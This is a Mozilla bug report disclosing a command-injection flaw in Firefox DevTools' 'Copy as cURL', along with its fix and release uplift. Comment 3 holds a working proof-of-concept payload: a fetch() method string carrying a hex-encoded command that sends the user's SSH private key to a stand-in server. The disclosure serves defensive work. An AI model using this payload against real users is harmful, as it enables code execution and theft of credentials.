'Copy As Curl' in the network panel of the devtools does not escape the HTTP method properly, leading to local code execution
Categories
(DevTools :: Netmonitor, defect, P2)
Tracking
(firefox-esr6874+ fixed, firefox73 wontfix, firefox74+ fixed, firefox75+ fixed)
People
(Reporter: pere.jobs, Assigned: Honza)
References
Details
(Keywords: reporter-external, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main74+][adv-esr68.6+])
Attachments
(3 files, 1 obsolete file)
|
57 bytes,
text/html
|
Details | |
|
47 bytes,
text/x-phabricator-request
|
RyanVM
:
approval-mozilla-beta+
RyanVM
:
approval-mozilla-esr68+
|
Details | Review |
|
443 bytes,
text/plain
|
Details |
Firefox devtools have a 'network' panel, where all the requests made by the current webpage are listed.
In this panel, the user can right-click on a query, and then select 'Copy As cURL'. The user is then expected to paste what he just copied into a terminal.
The issue is that the HTTP method of the request, which is controlled by the potentially malicious webpage, is not escaped when the curl command is formed.
As an example, the following javascript snippet will make a problematic request:
fetch('', {method: '|evilcommand|'});
When this snippet is run, and then a naive user uses 'Copy as cURL' on the generated request and then pastes it into a terminal, evilcommand is executed.
Note: an HTTP verb cannot contain a space (so one can not launch evilcommand with arguments), but the following characters are allowed, making it possible to construct complex malicious payloads: ` ' . * $ & | ~.
|
Reporter | |
Comment 1•5 years ago
|
||
The problem seems to come from this line, where the HTTP method is added to the command without any escaping:
https://dxr.mozilla.org/mozilla-central/source/devtools/client/shared/curl.js#122
|
||
Comment 2•5 years ago
|
||
Honza, can you take a look?
|
|
Reporter | |
Comment 3•5 years ago
|
||
Here is an example exploit:
fetch('/', {method: '&echo$IFS`echo`6375726c206c6f63616c686f73743a39393939202d2d64617461202224283c207e2f2e7373682f69645f72736129220a|xxd$IFS`echo`-r$IFS`echo`-p|sh&'});
When the generated request is copied as cURL and pasted to a terminal, the user's ssh private key is sent to a server (localhost:9999 in this example).
|
||
Updated•5 years ago
|
|
Assignee | |
Comment 4•5 years ago
|
||
|
||
Updated•5 years ago
|
|
|
Reporter | |
Comment 5•5 years ago
|
||
Hello ! Anything new ? Do you need help making a patch ?
This should be as simple as replacing
command.push(data.method);
with
command.push(escapeString(data.method));
in https://dxr.mozilla.org/mozilla-central/source/devtools/client/shared/curl.js#122
|
|
Reporter | |
Comment 6•5 years ago
|
||
Also, this bug still has the status UNCONFIRMED. Were you able to reproduce it ? Do you need more information about how to reproduce it ?
|
|
||
Comment 7•5 years ago
|
||
I think you've found the patch since your last comments...
As for the status field, I think the automatic update just missed it...
|
||
Updated•5 years ago
|
|
||
Updated•5 years ago
|
|
||
Comment 8•5 years ago
|
||
https://hg.mozilla.org/integration/autoland/rev/4e6cf4c65e2153dd212512aae8b43eea39ce4f36
https://hg.mozilla.org/mozilla-central/rev/4e6cf4c65e21
|
||
Comment 9•5 years ago
|
||
Please nominate this for Beta and ESR68 approval when you get a chance.
|
|
Assignee | |
Comment 10•5 years ago
|
||
Comment on attachment 9121841 [details]
Escape method argument
Beta/Release Uplift Approval Request
- User impact if declined: Potential risk of evaluating an evil script when user uses 'Copy as cURL' on HTTP request and pastes it into a terminal.
- Is this code covered by automated tests?: No
- Has the fix been verified in Nightly?: Yes
- Needs manual test from QE?: No
- If yes, steps to reproduce:
- List of other uplifts needed: None
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Small patch, only impacts web developers (DevTools)
- String changes made/needed:
|
|
Assignee | |
Comment 11•5 years ago
|
||
Comment on attachment 9121841 [details]
Escape method argument
ESR Uplift Approval Request
- If this is not a sec:{high,crit} bug, please state case for ESR consideration: Potential risk of evaluating an evil script when user uses 'Copy as cURL' on HTTP request and pastes it into a terminal.
- User impact if declined:
- Fix Landed on Version:
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Small patch, only affects web developers (DevTools)
- String or UUID changes made by this patch:
|
|
Assignee | |
Updated•5 years ago
|
|
|
||
Comment 12•5 years ago
|
||
Comment on attachment 9121841 [details]
Escape method argument
Fixes a devtools sec bug. Approved for 74.0b4 and 68.6esr.
|
|
||
Comment 13•5 years ago
|
||
| uplift | ||
https://hg.mozilla.org/releases/mozilla-beta/rev/0f94967140ce
https://hg.mozilla.org/releases/mozilla-esr68/rev/5da0d4b486f8
|
||
Updated•5 years ago
|
|
|
||
Updated•5 years ago
|
|
|
||
Updated•5 years ago
|
|
|
||
Updated•5 years ago
|
|
|
||
Comment 14•5 years ago
|
||
|
|
||
Comment 15•5 years ago
|
||
|
|
||
Updated•5 years ago
|
|
|
||
Updated•5 years ago
|
|
||
Updated•8 months ago
|
Description
•